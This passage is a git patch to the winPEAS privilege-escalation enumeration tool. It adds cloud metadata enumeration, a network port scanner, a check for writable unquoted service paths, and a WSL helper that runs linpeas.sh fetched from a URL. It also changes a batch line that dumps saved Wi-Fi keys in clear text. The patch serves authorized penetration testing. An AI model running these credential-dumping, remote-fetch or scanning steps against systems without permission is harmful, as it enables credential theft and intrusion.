From b43511972398f0cd8ebcea3b93bde0f26252d2c1 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Tue, 27 Aug 2024 22:08:48 +0200 Subject: [PATCH] WinPEASS Big Update --- LICENSE | 2 +- README.md | 3 - linPEAS/README.md | 2 - winPEAS/README.md | 2 - winPEAS/winPEASbat/README.md | 3 - winPEAS/winPEASbat/winPEAS.bat | 6 +- winPEAS/winPEASexe/README.md | 8 +- winPEAS/winPEASexe/Tests/SmokeTests.cs | 2 +- .../winPEAS/3rdParty/Watson/Watson.cs | 4 +- .../winPEAS/Checks/ApplicationsInfo.cs | 10 +- winPEAS/winPEASexe/winPEAS/Checks/Checks.cs | 118 ++- .../winPEASexe/winPEAS/Checks/CloudInfo.cs | 93 +++ .../winPEASexe/winPEAS/Checks/FileAnalysis.cs | 53 +- .../winPEASexe/winPEAS/Checks/FilesInfo.cs | 18 +- .../winPEASexe/winPEAS/Checks/ProcessInfo.cs | 9 +- .../winPEASexe/winPEAS/Checks/SystemInfo.cs | 3 +- .../winPEASexe/winPEAS/Helpers/Beaprint.cs | 10 +- winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs | 45 ++ .../Helpers/Registry/RegistryHelper.cs | 34 + .../winPEAS/Info/ApplicationInfo/AutoRuns.cs | 43 +- .../winPEAS/Info/CloudInfo/AWSInfo.cs | 201 +++++ .../winPEAS/Info/CloudInfo/AzureInfo.cs | 88 ++ .../winPEAS/Info/CloudInfo/CloudInfoBase.cs | 77 ++ .../winPEAS/Info/CloudInfo/EndpointData.cs | 10 + .../winPEAS/Info/CloudInfo/GCPInfo.cs | 208 +++++ .../winPEAS/Info/FilesInfo/WSL/WSLHelper.cs | 136 ++++ .../NetworkInfo/NetworkScanner/NetPinger.cs | 56 ++ .../NetworkScanner/NetworkScanner.cs | 93 +++ .../NetworkScanner/NetworkUtils.cs | 221 ++++++ .../NetworkInfo/NetworkScanner/PortScanner.cs | 122 +++ .../Info/ProcessInfo/DefensiveProcesses.cs | 751 +++--------------- .../winPEAS/Info/SystemInfo/SystemInfo.cs | 4 +- .../Browsers/Firefox/Firefox.cs | 2 +- winPEAS/winPEASexe/winPEAS/winPEAS.csproj | 13 +- .../winPEASexe/winPEAS/winPEAS.csproj.user | 2 +- winPEAS/winPEASps1/README.md | 4 +- 36 files changed, 1727 insertions(+), 729 deletions(-) create mode 100644 winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs diff --git a/LICENSE b/LICENSE index 78a5d1c..afa1236 100755 --- a/LICENSE +++ b/LICENSE @@ -1,7 +1,7 @@ COPYING -- Describes the terms under which peass-ng is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -peass-ng is (C) 2006-2022 Carlos Polop Martin. +peass-ng is (C) 2019-2024 Carlos Polop Martin. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free diff --git a/README.md b/README.md index c72e70b..47ac44c 100755 --- a/README.md +++ b/README.md @@ -38,6 +38,3 @@ If you want to **add something** and have **any cool idea** related to this proj All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission. - - -By Polop(TM) diff --git a/linPEAS/README.md b/linPEAS/README.md index 298bfc3..7f202a0 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -233,5 +233,3 @@ If you find any issue, please report it using **[github issues](https://github.c All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. - -By Polop(TM) diff --git a/winPEAS/README.md b/winPEAS/README.md index b0724fc..0407e78 100755 --- a/winPEAS/README.md +++ b/winPEAS/README.md @@ -23,5 +23,3 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s ## Advisory All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. - -By Polop diff --git a/winPEAS/winPEASbat/README.md b/winPEAS/winPEASbat/README.md index 112fc0d..444a33c 100755 --- a/winPEAS/winPEASbat/README.md +++ b/winPEAS/winPEASbat/README.md @@ -132,6 +132,3 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat ## Advisory All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. - - -By Polop(TM) diff --git a/winPEAS/winPEASbat/winPEAS.bat b/winPEAS/winPEASbat/winPEAS.bat index 0d43701..5478eea 100755 --- a/winPEAS/winPEASbat/winPEAS.bat +++ b/winPEAS/winPEASbat/winPEAS.bat @@ -4,7 +4,7 @@ COLOR 0F CALL :SetOnce REM :: WinPEAS - Windows local Privilege Escalation Awesome Script -REM :: Code by PEASS-ng; Re-Write by ThisLimn0 +REM :: Code by carlospolop; Re-Write by ThisLimn0 REM Registry scan of other drives besides REM /////true or false @@ -46,7 +46,7 @@ CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" -ECHO. by github.com/PEASS-ng +ECHO. by carlospolop ECHO. ECHO. @@ -363,7 +363,7 @@ CALL :T_Progress 1 :WifiCreds CALL :ColorLine " %E%33m[+]%E%97m WIFI" -for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%b key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) +for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) CALL :T_Progress 1 :BasicUserInfo diff --git a/winPEAS/winPEASexe/README.md b/winPEAS/winPEASexe/README.md index e80f09e..5f54578 100755 --- a/winPEAS/winPEASexe/README.md +++ b/winPEAS/winPEASexe/README.md @@ -178,6 +178,11 @@ Once you have installed and activated it you need to: - [x] DNS Cache (limit 70) - [x] Internet Settings +- **Cloud Metadata Enumeration** + - [x] AWS Metadata + - [x] GCP Metadata + - [x] Azure Metadata + - **Windows Credentials** - [x] Windows Vault - [x] Credential Manager @@ -256,6 +261,3 @@ If you find any issue, please report it using **[github issues](https://github.c ## Advisory All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. - - -By Polop diff --git a/winPEAS/winPEASexe/Tests/SmokeTests.cs b/winPEAS/winPEASexe/Tests/SmokeTests.cs index 49525a3..9542bf8 100644 --- a/winPEAS/winPEASexe/Tests/SmokeTests.cs +++ b/winPEAS/winPEASexe/Tests/SmokeTests.cs @@ -12,7 +12,7 @@ namespace winPEAS.Tests try { string[] args = new string[] { - "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "debug" + "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "cloud", "debug" }; Program.Main(args); } diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs index fbf64cc..307cf94 100644 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs +++ b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs @@ -20,7 +20,7 @@ namespace winPEAS._3rdParty.Watson { { 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" }, { 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" }, - { 19042, "20H2" } + { 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" } }; // Get OS Build number @@ -30,7 +30,6 @@ namespace winPEAS._3rdParty.Watson if (!supportedVersions.ContainsKey(buildNumber)) { Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'"); - return; } var version = supportedVersions[buildNumber]; @@ -39,7 +38,6 @@ namespace winPEAS._3rdParty.Watson else { Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber"); - return; } // List of KBs installed diff --git a/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs index 7e75254..fed1fe3 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs @@ -117,6 +117,7 @@ namespace winPEAS.Checks { (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, + { "Potentially sensitive file content:", Beaprint.ansi_color_bad }, }; string line = ""; @@ -158,9 +159,9 @@ namespace winPEAS.Checks line += "\n File: " + filepath_mod; } - if (app["isUnquotedSpaced"].ToLower() == "true") + if (app["isUnquotedSpaced"].ToLower() != "false") { - line += " (Unquoted and Space detected)"; + line += $" (Unquoted and Space detected) - {app["isUnquotedSpaced"]}"; } if (!string.IsNullOrEmpty(app["interestingFileRights"])) @@ -168,6 +169,11 @@ namespace winPEAS.Checks line += "\n FilePerms: " + app["interestingFileRights"]; } + if (app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"])) + { + line += "\n Potentially sensitive file content: " + app["sensitiveInfoList"]; + } + Beaprint.AnsiPrint(line, colorsA); Beaprint.PrintLineSeparator(); } diff --git a/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs b/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs index 17e7e7e..45e67d4 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs @@ -3,12 +3,14 @@ using System.Collections.Generic; using System.IO; using System.Linq; using System.Management; +using System.Net; using System.Security.Principal; using winPEAS.Helpers; using winPEAS.Helpers.AppLocker; using winPEAS.Helpers.Registry; using winPEAS.Helpers.Search; using winPEAS.Helpers.YamlConfig; +using winPEAS.Info.NetworkInfo.NetworkScanner; using winPEAS.Info.UserInfo; namespace winPEAS.Checks @@ -21,8 +23,12 @@ namespace winPEAS.Checks public static bool IsDebug = false; public static bool IsLinpeas = false; public static bool IsLolbas = false; + public static bool IsNetworkScan = false; public static bool SearchProgramFiles = false; + private static IEnumerable PortScannerPorts = null; + private static string NetworkScanOptions = string.Empty; + // Create Dynamic blacklists public static readonly string CurrentUserName = Environment.UserName; public static string CurrentUserDomainName = Environment.UserDomainName; @@ -47,7 +53,7 @@ namespace winPEAS.Checks private static readonly HashSet _systemCheckSelectedKeysHashSet = new HashSet(); // github url for Linpeas.sh - public static string LinpeasUrl = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh"; + public static string LinpeasUrl = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh"; public const string DefaultLogFile = "out.txt"; @@ -87,7 +93,8 @@ namespace winPEAS.Checks new SystemCheck("windowscreds", new WindowsCreds()), new SystemCheck("browserinfo", new BrowserInfo()), new SystemCheck("filesinfo", new FilesInfo()), - new SystemCheck("fileanalysis", new FileAnalysis()) + new SystemCheck("fileanalysis", new FileAnalysis()), + new SystemCheck("cloudinfo", new CloudInfo()) }; var systemCheckAllKeys = new HashSet(_systemChecks.Select(i => i.Key)); @@ -199,6 +206,52 @@ namespace winPEAS.Checks } } + if (arg.StartsWith("-network", StringComparison.CurrentCultureIgnoreCase)) + { + /* + -network="auto" - find interfaces/hosts automatically + -network="10.10.10.10,10.10.10.20" - scan only selected ip address(es) + -network="10.10.10.10/24" - scan host based on ip address/netmask + */ + if (!IsNetworkTypeValid(arg)) + { + Beaprint.ColorPrint($" [!] the \"-network\" argument is invalid. For help, run winpeass.exe --help", Beaprint.YELLOW); + + return; + } + + var parts = arg.Split('='); + string networkType = parts[1]; + + IsNetworkScan = true; + NetworkScanOptions = networkType; + } + + if (arg.StartsWith("-ports", StringComparison.CurrentCultureIgnoreCase)) + { + // e.g. -ports="80,443,8080" + var parts = arg.Split('='); + if (!IsNetworkScan || parts.Length != 2 || string.IsNullOrEmpty(parts[1])) + { + Beaprint.ColorPrint($" [!] the \"-network\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW); + + return; + } + + var portString = parts[1]; + IEnumerable ports = new List(); + try + { + PortScannerPorts = portString.Trim('"').Trim('\'').Split(',').ToList().ConvertAll(int.Parse); + } + catch (Exception) + { + Beaprint.ColorPrint($" [!] the \"-ports\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW); + + return; + } + } + string argToLower = arg.ToLower(); if (systemCheckAllKeys.Contains(argToLower)) { @@ -237,7 +290,7 @@ namespace winPEAS.Checks CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug); - RunChecks(isAllChecks, wait); + RunChecks(isAllChecks, wait, IsNetworkScan); SearchHelper.CleanLists(); @@ -258,7 +311,58 @@ namespace winPEAS.Checks } } - private static void RunChecks(bool isAllChecks, bool wait) + private static bool IsNetworkTypeValid(string arg) + { + var parts = arg.Split('='); + string networkType = string.Empty; + + if (parts.Length == 2 && !string.IsNullOrEmpty(parts[1])) + { + networkType = parts[1]; + + // auto + if (string.Equals(networkType, "auto", StringComparison.InvariantCultureIgnoreCase)) + { + return true; + } + + // netmask e.g. 10.10.10.10/24 + else if (networkType.Contains("/")) + { + var rangeParts = networkType.Split('/'); + + if (rangeParts.Length == 2 && int.TryParse(rangeParts[1], out int res) && res <= 32 && res >= 0) + { + return true; + } + } + // list of ip addresses + else if (networkType.Contains(",")) + { + var ips = networkType.Split(','); + + try + { + var validIpsCount = ips.ToList().ConvertAll(IPAddress.Parse).Count(); + } + catch (Exception) + { + return false; + } + + return true; + } + // single ip + else if (IPAddress.TryParse(networkType, out _)) + { + return true; + } + } + + return false; + } + + private static void RunChecks(bool isAllChecks, bool wait, bool isNetworkScan) { for (int i = 0; i < _systemChecks.Count; i++) { @@ -274,6 +378,12 @@ namespace winPEAS.Checks } } } + + if (isNetworkScan) + { + NetworkScanner scanner = new NetworkScanner(NetworkScanOptions, PortScannerPorts); + scanner.Scan(); + } } private static void CreateDynamicLists(bool isFileSearchEnabled) diff --git a/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs new file mode 100644 index 0000000..bf1dc37 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs @@ -0,0 +1,93 @@ +using System.Collections.Generic; +using winPEAS.Helpers; +using winPEAS.Info.CloudInfo; + +namespace winPEAS.Checks +{ + internal class CloudInfo : ISystemCheck + { + public void PrintInfo(bool isDebug) + { + Beaprint.GreatPrint("Cloud Information"); + + var cloudInfoList = new List + { + new AWSInfo(), + new AzureInfo(), + new GCPInfo() + }; + + foreach (var cloudInfo in cloudInfoList) + { + string isCloud = cloudInfo.IsCloud ? "Yes" : "No"; + string line = string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}"); + + Dictionary colorsMS = new Dictionary() + { + { "Yes", Beaprint.ansi_color_bad }, + }; + Beaprint.AnsiPrint(line, colorsMS); + } + + foreach (var cloudInfo in cloudInfoList) + { + if (cloudInfo.IsCloud) + { + Beaprint.MainPrint(cloudInfo.Name + " Enumeration"); + + if (cloudInfo.IsAvailable) + { + foreach (var kvp in cloudInfo.EndpointDataList()) + { + // key = "section", e.g. User, Network, ... + string section = kvp.Key; + var endpointDataList = kvp.Value; + + Beaprint.ColorPrint(section, Beaprint.ansi_color_good); + + foreach (var endpointData in endpointDataList) + { + var colors = new Dictionary + { + { endpointData.EndpointName, Beaprint.GRAY } + }; + + string message; + if (!string.IsNullOrEmpty(endpointData.Data)) + { + message = endpointData.Data; + // if it is a JSON data, add additional newline so it's displayed on a separate line + if (message.StartsWith("{")) + { + message = $"\n{message}\n"; + } + + if (endpointData.IsAttackVector) + { + colors.Add(message, Beaprint.ansi_color_bad); + } + else + { + colors.Add(message, Beaprint.ansi_color_gray); + } + } + else + { + message = "No data received from the metadata endpoint"; + } + + Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray); + } + + Beaprint.GrayPrint(""); + } + } + else + { + Beaprint.NoColorPrint("Could not connect to the metadata endpoint"); + } + } + } + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs index 3da86fd..b440757 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs @@ -1,4 +1,4 @@ -using System; +using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; @@ -97,9 +97,19 @@ namespace winPEAS.Checks else { foreach (var fold in file.FullPath.Split('\\').Skip(1)) - { - isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase); - if (isFileFound) break; + { + try + { + isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20)); + if (isFileFound) break; + } + catch (RegexMatchTimeoutException e) + { + if (Checks.IsDebug) + { + Beaprint.GrayPrint($"The file in folder regex {pattern} had a timeout in {fold} (ReDoS avoided but regex unchecked in a file)"); + } + } } } } @@ -111,7 +121,17 @@ namespace winPEAS.Checks } else { - isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase); + try + { + isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20)); + } + catch (RegexMatchTimeoutException e) + { + if (Checks.IsDebug) + { + Beaprint.GrayPrint($"The file regex {pattern} had a timeout in {file.Filename} (ReDoS avoided but regex unchecked in a file)"); + } + } } } @@ -148,7 +168,7 @@ namespace winPEAS.Checks return new bool[] { false, somethingFound }; } - private static List SearchContent(string text, string regex_str, bool caseinsensitive) + public static List SearchContent(string text, string regex_str, bool caseinsensitive) { List foundMatches = new List(); @@ -157,17 +177,20 @@ namespace winPEAS.Checks Regex rgx; bool is_re_match = false; try - { + { + // Escape backslashes in the regex string + string escapedRegex = regex_str.Trim().Replace(@"\", @"\\"); + // Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches" if (caseinsensitive) { - is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120)); - rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase); + is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120)); + rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase); } else { - is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120)); - rgx = new Regex(regex_str.Trim()); + is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.None, TimeSpan.FromSeconds(120)); + rgx = new Regex(escapedRegex); } } catch (RegexMatchTimeoutException e) @@ -200,8 +223,6 @@ namespace winPEAS.Checks Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}"); } - //} - return foundMatches; } @@ -444,7 +465,7 @@ namespace winPEAS.Checks foundRegexes[regex_obj.name][regex.name] = fileResults; } } - catch (Exception ex) + catch (System.IO.IOException) { // Cannot read the file } @@ -454,8 +475,8 @@ namespace winPEAS.Checks timer.Stop(); TimeSpan timeTaken = timer.Elapsed; - if (timeTaken.TotalMilliseconds > 20000) - Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}"); + if (timeTaken.TotalMilliseconds > 10000) + Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}ms in {f.FullPath}"); } } } diff --git a/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs index 2513936..b6974f9 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs @@ -290,15 +290,13 @@ namespace winPEAS.Checks const string distribution = "Distribution"; const string rootDirectory = "Root directory"; const string runWith = "Run command"; + const string wslUser = "WSL user"; + const string root = "root"; + var colors = new Dictionary(); - new List - { - linpeas, - distribution, - rootDirectory, - runWith - }.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad)); + new List { linpeas, distribution, rootDirectory, runWith, wslUser, root } + .ForEach(str => colors.Add(str, Beaprint.ansi_color_bad)); Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below"); Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors); @@ -310,14 +308,16 @@ namespace winPEAS.Checks string distributionSubKey = $"{basePath}\\{wslKey}"; string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs"; string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName"); + string user = WSLHelper.TryGetRootUser(distributionName, wslKey); Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" + + $" {wslUser}: \"{user}\"\n" + $" {rootDirectory}: \"{distributionRootDirectory}\"\n" + $" {runWith}: wsl.exe --distribution \"{distributionName}\"", colors); Beaprint.PrintLineSeparator(); } - catch (Exception) { } + catch (Exception ex) { } } // try to run linpeas.sh in the default distribution @@ -328,7 +328,7 @@ namespace winPEAS.Checks { try { - WSL.RunLinpeas(Checks.LinpeasUrl); + WSLHelper.RunLinpeas(Checks.LinpeasUrl); } catch (Exception ex) { diff --git a/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs index d1a6b14..a6d4ced 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs @@ -36,11 +36,14 @@ namespace winPEAS.Checks { "Possible DLL Hijacking.*", Beaprint.ansi_color_bad }, }; - if (DefensiveProcesses.Definitions.ContainsKey(procInfo["Name"])) + // we need to find first occurrence of the procinfo name + string processNameSanitized = procInfo["Name"].Trim().ToLower(); + + if (DefensiveProcesses.AVVendorsByProcess.ContainsKey(processNameSanitized)) { - if (!string.IsNullOrEmpty(DefensiveProcesses.Definitions[procInfo["Name"]])) + if (DefensiveProcesses.AVVendorsByProcess[processNameSanitized].Count > 0) { - procInfo["Product"] = DefensiveProcesses.Definitions[procInfo["Name"]]; + procInfo["Product"] = string.Join(", ", DefensiveProcesses.AVVendorsByProcess[processNameSanitized]); } colorsP[procInfo["Product"]] = Beaprint.ansi_color_good; } diff --git a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs index ab046f5..d8950b0 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs @@ -387,8 +387,7 @@ namespace winPEAS.Checks static void PrintCachedCreds() { - try - { + try{ Beaprint.MainPrint("Cached Creds"); Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user"); string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT"); diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs index ce11f8d..8cbc17e 100644 --- a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs +++ b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs @@ -81,6 +81,7 @@ namespace winPEAS.Helpers /---------------------------------------------------------------------------------\ | {1}Do you like PEASS?{0} | |---------------------------------------------------------------------------------| + | {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} | | {3}Follow on Twitter{0} : {2}@hacktricks_live{0} | | {3}Respect on HTB{0} : {2}SirBroccoli {0} | |---------------------------------------------------------------------------------| @@ -132,6 +133,7 @@ namespace winPEAS.Helpers Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR); Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR); Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR); + Console.WriteLine(LCYAN + " cloudinfo" + GRAY + " Enumerate cloud information" + NOCOLOR); Console.WriteLine(); Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR); Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR); @@ -146,6 +148,11 @@ namespace winPEAS.Helpers Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR); Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" + $" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR); + Console.WriteLine(LCYAN + " -network" + GRAY + $" Run additional network scanning - find network interfaces, hosts and scan nmap top 1000 TCP ports for each host found\n" + + $" -network=\"auto\" - find interfaces/hosts automatically" + NOCOLOR + "\n" + + $" -network=\"10.10.10.10,10.10.10.20\" - scan only selected ip address(es)" + NOCOLOR + "\n" + + $" -network=\"10.10.10.10/24\" - scan host based on ip address/netmask" + NOCOLOR + "\n" + + $" -ports=\"80,443,8080\" - If a list of ports is provided, use this list instead of the nmap top 1000 TCP" + NOCOLOR); } @@ -290,8 +297,7 @@ namespace winPEAS.Helpers string value = entry.Value; string key = entry.Key; - string line = ""; - + string line; if (!no_gray) { line = ansi_color_gray + " " + key + ": " + NOCOLOR + value; diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs b/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs index a905c08..c183446 100644 --- a/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs +++ b/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs @@ -122,6 +122,51 @@ namespace winPEAS.Helpers return binaryPath; } + public static bool CheckQuoteAndSpaceWithPermissions(string path, out List injectablePaths) + { + List result = new List(); + bool isInjectable = false; + + if (!path.Contains('"') && !path.Contains("'")) + { + if (path.Contains(" ")) + { + string currentPath = string.Empty; + foreach (var pathPart in Regex.Split(path, @"\s")) + { + currentPath += pathPart + " "; + + if (File.Exists(currentPath) || Directory.Exists(currentPath)) + { + var permissions = PermissionsHelper.GetPermissionsFolder(currentPath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT); + + if (permissions.Any()) + { + result.Add(currentPath); + isInjectable = true; + } + } + else + { + var firstPathPart = currentPath; + DirectoryInfo di = new DirectoryInfo(firstPathPart); + var exploitablePath = di.Parent.FullName; + var folderPermissions = PermissionsHelper.GetPermissionsFolder(exploitablePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT); + + if (folderPermissions.Any()) + { + result.Add(exploitablePath); + isInjectable = true; + }; + } + } + } + } 